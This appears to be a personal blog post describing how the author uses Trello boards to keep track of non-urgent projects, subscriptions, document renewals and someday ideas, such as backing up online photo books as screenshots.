Trello. This took me a long time to figure out. These are things that don’t need to be done, nothing is riding on them, but they matter (and maybe they shouldn’t) to me. I wrote about some of it here: The Art of Organizing (Things That Don’t Need to Be Organized) The Journal Project I Can’t Quit The Cost of Organizing Ideas – But I Keep Doing It Anyway An example is my digital photo books. I use Mixbook or Shutterfly services, and the kids love having the physical copy of a digital photobooks to leaf through. And so do I. I make ones for big trips too. But then I realised: if those companies disappear, all my digital books vanish. You can’t download them as PDFs or export them in any meaningful way (apart from having the printed copies — but what if my house burns down, or I want another copy?). After researching and asking around, the only real solution seems to be opening them full screen, taking screenshots, and saving them in Day One (link to one of my posts about it). It’s a huge project (well, potentially, once I start working on something and break it down into smaller tasks - it gets done). But I’m not touching it right now. However, having it on the list gets it out of my head. The other lists I have on my board are: I like knowing how much I spend and when things renew. I regularly cancel things. For example, Kindle Unlimited: I sign up when there’s a deal or when I need it, then cancel again. Same with Apple TV — if there’s a show I want, I get it for a month, then drop it. I hate having too many subscriptions that sit there unused. I didn’t put these in recurring tasks because some documents are valid for years or even decades. So I just keep a list. Sometimes I attach the files, but I don’t fully trust Trello with sensitive things, so the actual scanned documents live in my Dropbox. Renovations, things I want to study, photo books I still want to make. These live even further out than the “may or may not do” list. Not urgent, not actionable, probably not happening soon — but I don’t want to forget about them either. And most importantly, I don’t want to think about them. When I do a review, I’ll see them, remember them, and that’s enough. It’s simple. It’s not over-engineered. It’s not automated to death. It’s easy to maintain. And most importantly: things actually get done. My lists used to be huge and chaotic. This isn’t. NOTE: For work tasks I use Microsoft To Do, since it plugs straight into the rest of the Microsoft ecosystem we use.

4 views